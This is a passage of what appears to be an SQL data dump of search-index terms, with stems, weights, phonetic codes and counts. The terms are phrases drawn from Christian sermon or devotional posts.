(64791, 'in prayer', 'in prayer', 0, 1, 1.3, 'I516', 3, '*'),
(64796, 'in so', 'in so', 0, 1, 1.1667, 'I520', 3, '*'),
(64799, 'in the kingdom', 'in the kingdom', 0, 1, 1.4667, 'I5325235', 3, '*'),
(64800, 'in the realm', 'in the realm', 0, 1, 1.4, 'I53645', 2, '*'),
(64827, 'instructions', 'instruct', 0, 0, 0.8, 'I52362352', 9, '*'),
(64833, 'involved in', 'involv in', 0, 1, 1.3667, 'I514135', 3, '*'),
(64838, 'is also', 'is also', 0, 1, 1.2333, 'I242', 2, '*'),
(64840, 'is always', 'is always', 0, 1, 1.3, 'I242', 7, '*'),
(64847, 'is doing', 'is doing', 0, 1, 1.2667, 'I2352', 4, '*'),
(64862, 'is that they', 'is that they', 0, 1, 1.4, 'I230', 3, '*'),
(64874, 'it well', 'it well', 0, 1, 1.2333, 'I340', 2, '*'),
(64878, 'it will', 'it will', 0, 1, 1.2333, 'I340', 9, '*'),
(64884, 'jesus name', 'jesu name', 0, 1, 1.3333, 'J500', 7, '*'),
(64886, 'job', 'job', 0, 0, 0.2, 'J100', 7, '*'),
(64887, 'job or', 'job or', 0, 1, 1.2, 'J160', 2, '*'),
(64891, 'joke', 'joke', 0, 0, 0.2667, 'J000', 3, '*'),
(64909, 'knows the', 'know the', 0, 1, 1.3, 'K523', 2, '*'),
(64915, 'lead', 'lead', 0, 0, 0.2667, 'L300', 6, '*'),
(64916, 'lead you', 'lead you', 0, 1, 1.2667, 'L300', 2, '*'),
(64931, 'let the holy', 'let the holy', 0, 1, 1.4, 'L340', 4, '*'),
(64932, 'let us', 'let us', 0, 1, 1.2, 'L320', 3, '*'),
(64936, 'level', 'level', 0, 0, 0.3333, 'L140', 11, '*'),
(64939, 'level of', 'level of', 0, 1, 1.2667, 'L141', 7, '*'),
(64945, 'life because', 'life because', 0, 1, 1.4, 'L120', 2, '*'),
(64956, 'limit', 'limit', 0, 0, 0.3333, 'L530', 3, '*'),
(64968, 'lord that', 'lord that', 0, 1, 1.3, 'L630', 3, '*'),
(64988, 'make you', 'make you', 0, 1, 1.2667, 'M200', 9, '*'),
(64990, 'man is', 'man is', 0, 1, 1.2, 'M200', 6, '*'),
(64999, 'mindset', 'mindset', 0, 0, 0.4667, 'M323', 3, '*'),
(65027, 'natural', 'natur', 0, 0, 0.4667, 'N364', 2, '*'),
(65035, 'need to be', 'need to be', 0, 1, 1.3333, 'N310', 3, '*'),
(65041, 'not allow', 'not allow', 0, 1, 1.3, 'N340', 2, '*'),
(65051, 'not enough', 'not enough', 0, 1, 1.3333, 'N352', 2, '*'),
(65055, 'not for', 'not for', 0, 1, 1.2333, 'N316', 2, '*'),
(65072, 'occultic', 'occult', 0, 0, 0.5333, 'O2432', 3, '*'),
(65085, 'of god that', 'of god that', 0, 1, 1.3667, 'O123', 4, '*'),
(65086, 'of god the', 'of god the', 0, 1, 1.3333, 'O123', 2, '*'),
(65099, 'of your training', 'of your training', 0, 1, 1.5333, 'O163652', 3, '*'),
(65110, 'open', 'open', 0, 0, 0.2667, 'O150', 8, '*'),
(65118, 'or a', 'or a', 0, 1, 1.1333, 'O600', 4, '*'),
(65132, 'out what', 'out what', 0, 1, 1.2667, 'O300', 3, '*'),
(65135, 'outcome', 'outcom', 0, 0, 0.4667, 'O325', 3, '*'),
(65160, 'pay', 'pai', 0, 0, 0.2, 'P000', 4, '*'),
(65170, 'people is', 'peopl is', 0, 1, 1.3, 'P420', 4, '*'),
(65171, 'people is that', 'peopl is that', 0, 1, 1.4667, 'P423', 2, '*'),
(65188, 'plan', 'plan', 0, 0, 0.2667, 'P450', 10, '*'),
(65189, 'plan to', 'plan to', 0, 1, 1.2333, 'P453', 2, '*'),
(65198, 'prayer life', 'prayer life', 0, 1, 1.3667, 'P641', 2, '*'),
(65205, 'preparation', 'prepar', 0, 0, 0.7333, 'P61635', 3, '*'),
(65210, 'prepare', 'prepar', 0, 0, 0.4667, 'P616', 3, '*'),
(65226, 'promotion', 'promot', 0, 0, 0.6, 'P6535', 3, '*'),
(65229, 'proper', 'proper', 0, 0, 0.4, 'P616', 2, '*'),
(65240, 'quarter', 'quarter', 0, 0, 0.4667, 'Q636', 3, '*'),
(65243, 'rather', 'rather', 0, 0, 0.4, 'R360', 4, '*'),
(65246, 'realm', 'realm', 0, 0, 0.3333, 'R450', 5, '*'),
(65247, 'realm of', 'realm of', 0, 1, 1.2667, 'R451', 4, '*'),
(65249, 'rebuked', 'rebuk', 0, 0, 0.4667, 'R123', 2, '*'),
(65265, 'room', 'room', 0, 0, 0.2667, 'R500', 3, '*'),
(65272, 'sake', 'sake', 0, 0, 0.2667, 'S000', 2, '*'),
(65275, 'salary', 'salari', 0, 0, 0.4, 'S460', 4, '*'),
(65321, 'separate', 'separ', 0, 0, 0.5333, 'S163', 4, '*'),
(65324, 'set', 'set', 0, 0, 0.2, 'S300', 7, '*'),
(65333, 'so doing you', 'so doing you', 0, 1, 1.4, 'S352', 3, '*'),
(65337, 'sometimes', 'sometim', 0, 0, 0.6, 'S5352', 4, '*'),
(65354, 'spare', 'spare', 0, 0, 0.3333, 'S160', 2, '*'),
(65359, 'spiritual life', 'spiritu life', 0, 1, 1.4667, 'S16341', 4, '*'),
(65363, 'spread', 'spread', 0, 0, 0.4, 'S163', 2, '*'),
(65380, 'start putting', 'start putting', 0, 1, 1.4333, 'S3631352', 2, '*'),
(65388, 'steps', 'step', 0, 0, 0.3333, 'S312', 7, '*'),
(65393, 'steps to', 'step to', 0, 1, 1.2667, 'S3123', 3, '*'),
(65400, 'such that', 'such that', 0, 1, 1.3, 'S300', 6, '*'),
(65421, 'take your', 'take your', 0, 1, 1.3, 'T260', 4, '*'),
(65422, 'take your prayer', 'take your prayer', 0, 1, 1.5333, 'T2616', 2, '*'),
(65423, 'telling', 'tell', 0, 0, 0.4667, 'T452', 2, '*'),
(65433, 'that all the', 'that all the', 0, 1, 1.4, 'T430', 3, '*'),
(65439, 'that every', 'that every', 0, 1, 1.3333, 'T160', 3, '*'),
(65442, 'that is what', 'that is what', 0, 1, 1.4, 'T230', 3, '*'),
(65444, 'that they', 'that they', 0, 1, 1.3, 'T000', 5, '*'),
(65445, 'that they will', 'that they will', 0, 1, 1.4667, 'T400', 3, '*'),
(65446, 'that will be', 'that will be', 0, 1, 1.4, 'T410', 3, '*'),
(65456, 'that you will', 'that you will', 0, 1, 1.4333, 'T400', 5, '*'),
(65471, 'the covenant', 'the covenant', 0, 1, 1.4, 'T2153', 2, '*'),
(65481, 'the first', 'the first', 0, 1, 1.3, 'T1623', 6, '*'),
(65485, 'the force', 'the force', 0, 1, 1.3, 'T162', 2, '*'),
(65495, 'the level', 'the level', 0, 1, 1.3, 'T414', 6, '*'),
(65498, 'the lord that', 'the lord that', 0, 1, 1.4333, 'T463', 3, '*'),
(65502, 'the money', 'the money', 0, 1, 1.3, 'T500', 2, '*'),
(65504, 'the more', 'the more', 0, 1, 1.2667, 'T560', 5, '*'),
(65508, 'the realm', 'the realm', 0, 1, 1.3, 'T645', 4, '*'),
(65509, 'the realm of', 'the realm of', 0, 1, 1.4, 'T6451', 4, '*'),
(65531, 'they will', 'thei will', 0, 1, 1.3, 'T400', 5, '*'),
(65536, 'things that you', 'thing that you', 0, 1, 1.5, 'T523', 3, '*'),
(65573, 'to enjoy', 'to enjoy', 0, 1, 1.2667, 'T520', 3, '*'),
(65575, 'to find', 'to find', 0, 1, 1.2333, 'T153', 2, '*'),
(65577, 'to have', 'to have', 0, 1, 1.2333, 'T100', 8, '*'),
(65578, 'to have a', 'to have a', 0, 1, 1.3, 'T100', 4, '*'),
(65586, 'to operate', 'to operate', 0, 1, 1.3333, 'T163', 2, '*'),
(65601, 'to your', 'to your', 0, 1, 1.2333, 'T600', 16, '*'),
(65604, 'training', 'train', 0, 0, 0.5333, 'T652', 8, '*'),
(65605, 'training in', 'train in', 0, 1, 1.3667, 'T6525', 3, '*'),
(65616, 'understanding', 'understand', 0, 0, 0.8667, 'U536235352', 6, '*'),
(65617, 'understanding of', 'understand of', 0, 1, 1.5333, 'U5362353521', 3, '*'),
(65620, 'up your', 'up your', 0, 1, 1.2333, 'U160', 8, '*'),
(65624, 'upon the', 'upon the', 0, 1, 1.2667, 'U153', 3, '*'),
(65643, 'wants', 'want', 0, 0, 0.3333, 'W532', 13, '*'),
(65644, 'wants you', 'want you', 0, 1, 1.3, 'W532', 5, '*'),
(65645, 'wants you to', 'want you to', 0, 1, 1.4, 'W5323', 5, '*'),
(65667, 'what you have', 'what you have', 0, 1, 1.4333, 'W310', 2, '*'),
(65668, 'what your', 'what your', 0, 1, 1.3, 'W360', 2, '*'),
(65670, 'when god', 'when god', 0, 1, 1.2667, 'W523', 9, '*'),
(65671, 'when god gives', 'when god gives', 0, 1, 1.4667, 'W523212', 2, '*'),
(65675, 'who knows', 'who knows', 0, 1, 1.3, 'W252', 3, '*'),
(65685, 'will always', 'will always', 0, 1, 1.3667, 'W420', 5, '*'),
(65697, 'will flow', 'will flow', 0, 1, 1.3, 'W414', 2, '*'),
(65699, 'will help', 'will help', 0, 1, 1.3, 'W410', 4, '*'),
(65701, 'will last', 'will last', 0, 1, 1.3, 'W423', 2, '*'),
(65740, 'you an', 'you an', 0, 1, 1.2, 'Y500', 2, '*'),
(65750, 'you cannot afford', 'you cannot afford', 0, 1, 1.5667, 'Y253163', 4, '*'),
(65753, 'you do not', 'you do not', 0, 1, 1.3333, 'Y353', 5, '*'),
(65754, 'you engage', 'you engage', 0, 1, 1.3333, 'Y520', 2, '*'),
(65766, 'you start', 'you start', 0, 1, 1.3, 'Y2363', 7, '*'),
(65769, 'you take', 'you take', 0, 1, 1.2667, 'Y320', 5, '*'),
(65773, 'you to have', 'you to have', 0, 1, 1.3667, 'Y310', 2, '*'),
(65778, 'you will not', 'you will not', 0, 1, 1.4, 'Y453', 4, '*'),
(65815, 'your prayer', 'your prayer', 0, 1, 1.3667, 'Y616', 3, '*'),
(65816, 'your prayer life', 'your prayer life', 0, 1, 1.5333, 'Y61641', 2, '*'),
(65824, 'your spiritual life', 'your spiritual life', 0, 1, 1.6333, 'Y6216341', 3, '*'),
(65829, 'your training', 'your training', 0, 1, 1.4333, 'Y63652', 4, '*'),
(65830, 'your training in', 'your training in', 0, 1, 1.5333, 'Y636525', 3, '*'),
(65833, 'yourself from', 'yourself from', 0, 1, 1.4333, 'Y624165', 3, '*'),
(65835, 'yourself in', 'yourself in', 0, 1, 1.3667, 'Y62415', 2, '*'),
(65837, 'yourself on', 'yourself on', 0, 1, 1.3667, 'Y62415', 3, '*'),
(66578, 'in your life', 'in your life', 0, 1, 1.4, 'I5641', 16, '*'),
(66605, 'is there', 'is there', 0, 1, 1.2667, 'I236', 5, '*'),
(66905, 'take a', 'take a', 0, 1, 1.2, 'T200', 3, '*'),
(68030, '01', '01', 0, 0, 0.2, '', 4, '*'),
(68103, 'afraid', 'afraid', 0, 0, 0.4, 'A163', 2, '*'),
(68162, 'as you go', 'as you go', 0, 1, 1.3, 'A200', 3, '*'),
(68226, 'by your', 'by your', 0, 1, 1.2333, 'B600', 3, '*'),
(68255, 'causes', 'caus', 0, 0, 0.4, 'C000', 3, '*'),
(68296, 'dearly', 'dearli', 0, 0, 0.4, 'D640', 27, '*'),
(68297, 'dearly beloved', 'dearli beloved', 0, 1, 1.4667, 'D641413', 27, '*'),
(68417, 'fight', 'fight', 0, 0, 0.3333, 'F230', 5, '*'),
(68472, 'go into', 'go into', 0, 1, 1.2333, 'G530', 3, '*'),
(68473, 'go into 2017', 'go into 2017', 0, 1, 1.4, 'G530', 2, '*'),
(68485, 'god will not', 'god will not', 0, 1, 1.4, 'G3453', 4, '*'),
(68538, 'in life', 'in life', 0, 1, 1.2333, 'I541', 15, '*'),
(68549, 'into 2017', 'into 2017', 0, 1, 1.3, 'I530', 2, '*'),
(68637, 'life that', 'life that', 0, 1, 1.3, 'L130', 6, '*'),
(68702, 'next week', 'next week', 0, 1, 1.3, 'N232', 31, '*'),
(68703, 'next week go', 'next week go', 0, 1, 1.4, 'N232', 29, '*'),
(68775, 'only person', 'onli person', 0, 1, 1.3667, 'O541625', 2, '*'),
(68776, 'only person that', 'onli person that', 0, 1, 1.5333, 'O5416253', 2, '*'),
(68795, 'person that', 'person that', 0, 1, 1.3667, 'P6253', 3, '*'),
(68797, 'picked', 'pick', 0, 0, 0.4, 'P230', 2, '*'),
(68798, 'picked the', 'pick the', 0, 1, 1.3333, 'P230', 2, '*'),
(68799, 'picked the wrong', 'pick the wrong', 0, 1, 1.5333, 'P23652', 2, '*'),
(68993, 'the only', 'the only', 0, 1, 1.2667, 'T540', 6, '*'),
(68994, 'the only person', 'the only person', 0, 1, 1.5, 'T541625', 2, '*'),
(69014, 'the wrong', 'the wrong', 0, 1, 1.3, 'T652', 2, '*'),
(69036, 'this year', 'thi year', 0, 1, 1.3, 'T260', 5, '*'),
(69045, 'till next week', 'till next week', 0, 1, 1.4667, 'T45232', 30, '*'),
(69130, 'week', 'week', 0, 0, 0.2667, 'W200', 32, '*'),
(69131, 'week go', 'week go', 0, 1, 1.2333, 'W200', 29, '*'),
(69132, 'week go and', 'week go and', 0, 1, 1.3667, 'W253', 29, '*'),
(69188, 'words that', 'word that', 0, 1, 1.3333, 'W6323', 2, '*'),
(69214, 'you go', 'you go', 0, 1, 1.2, 'Y200', 3, '*'),
(69215, 'you go into', 'you go into', 0, 1, 1.3667, 'Y253', 2, '*'),
(74169, '01 2017', '01 2017', 0, 1, 1.2333, '', 4, '*'),
(74243, 'and it', 'and it', 0, 1, 1.2, 'A530', 13, '*'),
(74322, 'calls', 'call', 0, 0, 0.3333, 'C420', 2, '*'),
(74357, 'curse', 'curs', 0, 0, 0.3333, 'C620', 4, '*'),
(74368, 'david', 'david', 0, 0, 0.3333, 'D130', 8, '*'),
(74427, 'god there', 'god there', 0, 1, 1.3, 'G360', 4, '*'),
(74445, 'he calls', 'he calls', 0, 1, 1.2667, 'H242', 2, '*'),
(74556, 'not an', 'not an', 0, 1, 1.2, 'N350', 3, '*'),
(74560, 'of god there', 'of god there', 0, 1, 1.4, 'O1236', 3, '*'),
(74680, 'that makes', 'that makes', 0, 1, 1.3333, 'T520', 5, '*'),
(74681, 'that makes you', 'that makes you', 0, 1, 1.4667, 'T520', 4, '*'),
(74727, 'to curse', 'to curse', 0, 1, 1.2667, 'T262', 2, '*'),
(74729, 'to david', 'to david', 0, 1, 1.2667, 'T130', 2, '*'),
(74830, 'yourself with', 'yourself with', 0, 1, 1.4333, 'Y62413', 5, '*'),
(75214, 'a difference', 'a difference', 0, 1, 1.4, 'A31652', 2, '*'),
(75215, 'a difference between', 'a difference between', 0, 1, 1.6667, 'A31652135', 2, '*'),
(75227, 'a man to', 'a man to', 0, 1, 1.2667, 'A530', 5, '*'),
(75229, 'a spirit', 'a spirit', 0, 1, 1.2667, 'A2163', 3, '*'),
(75233, 'a thing', 'a thing', 0, 1, 1.2333, 'A352', 4, '*'),
(75237, 'able', 'abl', 0, 0, 0.2667, 'A140', 13, '*'),
(75238, 'able to', 'abl to', 0, 1, 1.2333, 'A143', 13, '*'),
(75249, 'accuracy', 'accuraci', 0, 0, 0.5333, 'A262', 2, '*'),
(75262, 'actually', 'actual', 0, 0, 0.5333, 'A234', 7, '*'),
(75271, 'all times', 'all times', 0, 1, 1.3, 'A4352', 2, '*'),
(75284, 'and a', 'and a', 0, 1, 1.1667, 'A530', 4, '*'),
(75289, 'and great', 'and great', 0, 1, 1.3, 'A53263', 3, '*'),
(75298, 'and status', 'and status', 0, 1, 1.3333, 'A53232', 2, '*'),
(75323, 'ask', 'ask', 0, 0, 0.2, 'A200', 11, '*'),
(75330, 'at all', 'at all', 0, 1, 1.2, 'A340', 3, '*'),
(75331, 'at all times', 'at all times', 0, 1, 1.4, 'A34352', 2, '*'),
(75332, 'attention', 'attent', 0, 0, 0.6, 'A3535', 3, '*'),
(75333, 'attention to', 'attent to', 0, 1, 1.4, 'A35353', 2, '*'),
(75336, 'be able', 'be able', 0, 1, 1.2333, 'B400', 10, '*'),
(75337, 'be able to', 'be able to', 0, 1, 1.3333, 'B430', 10, '*'),
(75346, 'be ready', 'be ready', 0, 1, 1.2667, 'B630', 3, '*'),
(75348, 'because i', 'becaus i', 0, 1, 1.3, 'B200', 2, '*'),
(75352, 'before god', 'befor god', 0, 1, 1.3333, 'B623', 4, '*'),
(75354, 'before the', 'befor the', 0, 1, 1.3333, 'B630', 5, '*'),
(75367, 'bible talks', 'bibl talks', 0, 1, 1.3667, 'B4342', 2, '*'),
(75368, 'bible talks of', 'bibl talks of', 0, 1, 1.4667, 'B43421', 2, '*'),
(75369, 'bold', 'bold', 0, 0, 0.2667, 'B430', 2, '*'),
(75380, 'but men', 'but men', 0, 1, 1.2333, 'B350', 2, '*'),
(75384, 'by faith', 'by faith', 0, 1, 1.2667, 'B300', 5, '*'),
(75392, 'call', 'call', 0, 0, 0.2667, 'C400', 12, '*'),
(75393, 'call you', 'call you', 0, 1, 1.2667, 'C400', 3, '*'),
(75397, 'can take', 'can take', 0, 1, 1.2667, 'C532', 2, '*'),
(75406, 'carry', 'carri', 0, 0, 0.3333, 'C600', 8, '*'),
(75407, 'carry it', 'carri it', 0, 1, 1.2667, 'C630', 2, '*'),
(75409, 'carry the', 'carri the', 0, 1, 1.3, 'C630', 4, '*'),
(75419, 'cold', 'cold', 0, 0, 0.2667, 'C430', 3, '*'),
(75422, 'come it', 'come it', 0, 1, 1.2333, 'C530', 2, '*'),
(75432, 'correctly', 'correctli', 0, 0, 0.6, 'C6234', 4, '*'),
(75442, 'covenants', 'coven', 0, 0, 0.6, 'C1532', 4, '*'),
(75449, 'daniel', 'daniel', 0, 0, 0.4, 'D540', 2, '*'),
(75455, 'deceived', 'deceiv', 0, 0, 0.5333, 'D213', 2, '*'),
(75464, 'decide', 'decid', 0, 0, 0.4, 'D230', 2, '*'),
(75475, 'determines', 'determin', 0, 0, 0.6667, 'D652', 4, '*'),
(75476, 'determines your', 'determin your', 0, 1, 1.5, 'D6526', 2, '*'),
(75478, 'difference', 'differ', 0, 0, 0.6667, 'D1652', 7, '*'),
(75479, 'difference between', 'differ between', 0, 1, 1.6, 'D1652135', 3, '*'),
(75493, 'dress', 'dress', 0, 0, 0.3333, 'D620', 2, '*'),
(75498, 'dressed', 'dress', 0, 0, 0.4667, 'D623', 2, '*'),
(75501, 'dressing', 'dress', 0, 0, 0.5333, 'D6252', 3, '*'),
(75534, 'every time', 'everi time', 0, 1, 1.3333, 'E1635', 2, '*'),
(75549, 'failure', 'failur', 0, 0, 0.4667, 'F460', 4, '*'),
(75553, 'faith as', 'faith as', 0, 1, 1.2667, 'F320', 3, '*'),
(75554, 'faith as you', 'faith as you', 0, 1, 1.4, 'F320', 2, '*'),
(75559, 'faith that', 'faith that', 0, 1, 1.3333, 'F300', 4, '*'),
(75563, 'faith there', 'faith there', 0, 1, 1.3667, 'F360', 2, '*'),
(75567, 'faith you', 'faith you', 0, 1, 1.3, 'F300', 4, '*'),
(75568, 'faith you must', 'faith you must', 0, 1, 1.4667, 'F3523', 2, '*'),
(75577, 'filled', 'fill', 0, 0, 0.4, 'F430', 3, '*'),
(75578, 'filled with', 'fill with', 0, 1, 1.3667, 'F430', 3, '*'),
(75594, 'funny', 'funni', 0, 0, 0.3333, 'F500', 3, '*'),
(75610, 'get it', 'get it', 0, 1, 1.2, 'G300', 2, '*'),
(75611, 'get it right', 'get it right', 0, 1, 1.4, 'G3623', 2, '*'),
(75615, 'getting', 'get', 0, 0, 0.4667, 'G352', 7, '*'),
(75616, 'getting better', 'get better', 0, 1, 1.4667, 'G352136', 2, '*'),
(75618, 'getting it', 'get it', 0, 1, 1.3333, 'G3523', 2, '*'),
(75619, 'getting it right', 'get it right', 0, 1, 1.5333, 'G3523623', 2, '*'),
(75620, 'give it', 'give it', 0, 1, 1.2333, 'G130', 2, '*'),
(75624, 'given', 'given', 0, 0, 0.3333, 'G150', 9, '*'),
(75625, 'given us', 'given us', 0, 1, 1.2667, 'G152', 3, '*'),
(75627, 'god comes', 'god comes', 0, 1, 1.3, 'G3252', 4, '*'),
(75631, 'god gave', 'god gave', 0, 1, 1.2667, 'G321', 2, '*'),
(75633, 'god has given', 'god has given', 0, 1, 1.4333, 'G3215', 3, '*'),
(75636, 'god through', 'god through', 0, 1, 1.3667, 'G362', 2, '*'),
(75638, 'god with', 'god with', 0, 1, 1.2667, 'G300', 4, '*'),
(75640, 'great faith', 'great faith', 0, 1, 1.3667, 'G6313', 2, '*'),
(75642, 'had', 'had', 0, 0, 0.2, 'H300', 21, '*'),
(75643, 'had the', 'had the', 0, 1, 1.2333, 'H300', 4, '*'),
(75646, 'has been', 'ha been', 0, 1, 1.2667, 'H215', 3, '*'),
(75648, 'has given', 'ha given', 0, 1, 1.3, 'H215', 5, '*'),
(75649, 'has given us', 'ha given us', 0, 1, 1.4, 'H2152', 3, '*'),
(75650, 'has spoken', 'ha spoken', 0, 1, 1.3333, 'H2125', 5, '*'),
(75652, 'have the right', 'have the right', 0, 1, 1.4667, 'H13623', 2, '*'),
(75656, 'he will', 'he will', 0, 1, 1.2333, 'H400', 10, '*'),
(75673, 'hot', 'hot', 0, 0, 0.2, 'H300', 2, '*'),
(75687, 'in 2017', 'in 2017', 0, 1, 1.2333, 'I500', 4, '*'),
(75694, 'inside', 'insid', 0, 0, 0.4, 'I523', 6, '*'),
(75703, 'is a difference', 'is a difference', 0, 1, 1.5, 'I231652', 2, '*'),
(75706, 'is a spirit', 'is a spirit', 0, 1, 1.3667, 'I2163', 2, '*'),
(75711, 'is an', 'is an', 0, 1, 1.1667, 'I250', 6, '*'),
(75720, 'it by', 'it by', 0, 1, 1.1667, 'I310', 2, '*'),
(75729, 'it right', 'it right', 0, 1, 1.2667, 'I3623', 3, '*'),
(75735, 'it takes', 'it takes', 0, 1, 1.2667, 'I320', 5, '*'),
(75740, 'it you', 'it you', 0, 1, 1.2, 'I300', 2, '*'),
(75751, 'joseph', 'joseph', 0, 0, 0.4, 'J100', 6, '*'),
(75754, 'joshua', 'joshua', 0, 0, 0.4, 'J000', 5, '*'),
(75764, 'key', 'kei', 0, 0, 0.2, 'K000', 6, '*'),
(75767, 'kind of', 'kind of', 0, 1, 1.2333, 'K531', 4, '*'),
(75784, 'let your heart', 'let your heart', 0, 1, 1.4667, 'L363', 3, '*'),
(75788, 'life this', 'life this', 0, 1, 1.3, 'L132', 3, '*'),
(75791, 'little', 'littl', 0, 0, 0.4, 'L340', 5, '*'),
(75794, 'lord has', 'lord has', 0, 1, 1.2667, 'L632', 4, '*'),
(75796, 'lose', 'lose', 0, 0, 0.2667, 'L200', 6, '*'),
(75805, 'man to', 'man to', 0, 1, 1.2, 'M300', 6, '*'),
(75819, 'men with', 'men with', 0, 1, 1.2667, 'M300', 2, '*'),
(75828, 'mountains', 'mountain', 0, 0, 0.6, 'M352', 2, '*'),
(75831, 'must carry', 'must carry', 0, 1, 1.3333, 'M2326', 3, '*'),
(75834, 'must have', 'must have', 0, 1, 1.3, 'M231', 2, '*'),
(75844, 'nature', 'natur', 0, 0, 0.4, 'N360', 3, '*'),
(75849, 'need to do', 'need to do', 0, 1, 1.3333, 'N300', 4, '*'),
(75855, 'nobody', 'nobodi', 0, 0, 0.4, 'N130', 2, '*'),
(75860, 'not be', 'not be', 0, 1, 1.2, 'N310', 17, '*'),
(75888, 'of faith', 'of faith', 0, 1, 1.2667, 'O130', 6, '*'),
(75894, 'of god comes', 'of god comes', 0, 1, 1.4, 'O123252', 2, '*'),
(75910, 'of victory', 'of victory', 0, 1, 1.3333, 'O1236', 2, '*'),
(75920, 'only be', 'onli be', 0, 1, 1.2333, 'O541', 3, '*'),
(75922, 'only what', 'onli what', 0, 1, 1.3, 'O543', 2, '*'),
(75935, 'pays', 'pai', 0, 0, 0.2667, 'P200', 2, '*'),
(75938, 'people will', 'peopl will', 0, 1, 1.3667, 'P400', 2, '*'),
(75942, 'pleasing', 'pleas', 0, 0, 0.5333, 'P4252', 2, '*'),
(75943, 'pleasing god', 'pleas god', 0, 1, 1.4, 'P42523', 2, '*'),
(75945, 'position and', 'posit and', 0, 1, 1.4, 'P2353', 2, '*'),
(75958, 'protect', 'protect', 0, 0, 0.4667, 'P6323', 3, '*'),
(75967, 'ran', 'ran', 0, 0, 0.2, 'R500', 2, '*'),
(75975, 'ready for', 'readi for', 0, 1, 1.3, 'R316', 6, '*'),
(75999, 'road', 'road', 0, 0, 0.2667, 'R300', 5, '*'),
(76008, 'season', 'season', 0, 0, 0.4, 'S500', 4, '*'),
(76019, 'situation', 'situat', 0, 0, 0.6, 'S350', 6, '*'),
(76026, 'spirit is', 'spirit is', 0, 1, 1.3, 'S1632', 4, '*'),
(76038, 'spirit that', 'spirit that', 0, 1, 1.3667, 'S163', 2, '*'),
(76040, 'spirit the', 'spirit the', 0, 1, 1.3333, 'S163', 2, '*'),
(76050, 'spirit will', 'spirit will', 0, 1, 1.3667, 'S1634', 4, '*'),
(76054, 'spoken', 'spoken', 0, 0, 0.4, 'S125', 6, '*'),
(76068, 'take it', 'take it', 0, 1, 1.2333, 'T230', 5, '*'),
(76069, 'take it by', 'take it by', 0, 1, 1.3333, 'T231', 2, '*'),
(76072, 'takes', 'take', 0, 0, 0.3333, 'T200', 6, '*'),
(76080, 'tells', 'tell', 0, 0, 0.3333, 'T420', 4, '*'),
(76096, 'that spirit', 'that spirit', 0, 1, 1.3667, 'T2163', 2, '*'),
(76113, 'the bible talks', 'the bible talks', 0, 1, 1.5, 'T14342', 2, '*'),
(76125, 'the kind', 'the kind', 0, 1, 1.2667, 'T253', 2, '*'),
(76126, 'the kind of', 'the kind of', 0, 1, 1.3667, 'T2531', 2, '*'),
(76127, 'the lord has', 'the lord has', 0, 1, 1.4, 'T4632', 4, '*'),
(76140, 'the right', 'the right', 0, 1, 1.3, 'T623', 10, '*'),
(76143, 'the road', 'the road', 0, 1, 1.2667, 'T630', 5, '*'),
(76150, 'the two', 'the two', 0, 1, 1.2333, 'T000', 4, '*'),
(76182, 'time and', 'time and', 0, 1, 1.2667, 'T530', 6, '*'),
(76199, 'to give', 'to give', 0, 1, 1.2333, 'T210', 3, '*'),
(76204, 'to lose', 'to lose', 0, 1, 1.2333, 'T420', 3, '*'),
(76206, 'to me', 'to me', 0, 1, 1.1667, 'T500', 3, '*'),
(76218, 'to us', 'to us', 0, 1, 1.1667, 'T200', 7, '*'),
(76222, 'to where', 'to where', 0, 1, 1.2667, 'T600', 4, '*'),
(76226, 'truth', 'truth', 0, 0, 0.3333, 'T630', 4, '*'),
(76233, 'two things', 'two things', 0, 1, 1.3333, 'T520', 2, '*'),
(76244, 'us in', 'us in', 0, 1, 1.1667, 'U250', 4, '*'),
(76245, 'us in the', 'us in the', 0, 1, 1.3, 'U253', 3, '*'),
(76259, 'we will', 'we will', 0, 1, 1.2333, 'W400', 2, '*'),
(76268, 'what makes', 'what makes', 0, 1, 1.3333, 'W352', 3, '*'),
(76275, 'when he', 'when he', 0, 1, 1.2333, 'W500', 6, '*'),
(76277, 'when he is', 'when he is', 0, 1, 1.3333, 'W520', 2, '*'),
(76288, 'will do it', 'will do it', 0, 1, 1.3333, 'W430', 2, '*'),
(76289, 'will give', 'will give', 0, 1, 1.3, 'W421', 3, '*'),
(76291, 'will give you', 'will give you', 0, 1, 1.4333, 'W421', 3, '*'),
(76294, 'will need', 'will need', 0, 1, 1.3, 'W453', 4, '*'),
(76296, 'will need to', 'will need to', 0, 1, 1.4, 'W453', 2, '*'),
(76297, 'will not be', 'will not be', 0, 1, 1.3667, 'W4531', 6, '*'),
(76300, 'will only', 'will only', 0, 1, 1.3, 'W454', 3, '*'),
(76309, 'winning', 'win', 0, 0, 0.4667, 'W520', 2, '*'),
(76339, 'you all', 'you all', 0, 1, 1.2333, 'Y400', 2, '*'),
(76346, 'you must carry', 'you must carry', 0, 1, 1.4667, 'Y52326', 3, '*'),
(76347, 'you must have', 'you must have', 0, 1, 1.4333, 'Y5231', 2, '*'),
(76351, 'you the future', 'you the future', 0, 1, 1.4667, 'Y3136', 3, '*'),
(76353, 'you there', 'you there', 0, 1, 1.3, 'Y360', 3, '*'),
(76356, 'you what', 'you what', 0, 1, 1.2667, 'Y300', 4, '*'),
(76358, 'you will need', 'you will need', 0, 1, 1.4333, 'Y453', 3, '*'),
(76362, 'you\'ve', 'you', 0, 0, 0.4, 'Y100', 3, '*'),
(76367, 'your faith', 'your faith', 0, 1, 1.3333, 'Y613', 6, '*'),
(76371, 'your life this', 'your life this', 0, 1, 1.4667, 'Y64132', 3, '*'),
(76372, 'your position', 'your position', 0, 1, 1.4333, 'Y61235', 2, '*'),
(76378, 'your time', 'your time', 0, 1, 1.3, 'Y635', 6, '*'),
(77274, '13 22', '13 22', 0, 1, 1.1667, '', 2, '*'),
(77285, '14-15', '14-15', 0, 0, 0.5, '', 2, '*'),
(77294, '15-16', '15-16', 0, 0, 0.5, '', 4, '*'),
(77304, '19-21', '19-21', 0, 0, 0.5, '', 2, '*'),
(77330, '2 the', '2 the', 0, 1, 1.1667, 'T000', 4, '*'),
(77334, '2 timothy', '2 timothy', 0, 1, 1.3, 'T530', 2, '*'),
(77343, '24', '24', 0, 0, 0.2, '', 8, '*'),
(77346, '25', '25', 0, 0, 0.2, '', 8, '*'),
(77357, '3 17-18', '3 17-18', 0, 1, 1.2333, '', 2, '*'),
(77368, '38', '38', 0, 0, 0.2, '', 3, '*'),
(77371, '4 1', '4 1', 0, 1, 1.1, '', 4, '*'),
(77375, '4 17', '4 17', 0, 1, 1.1333, '', 2, '*'),
(77377, '4-5', '4-5', 0, 0, 0.3, '', 3, '*'),
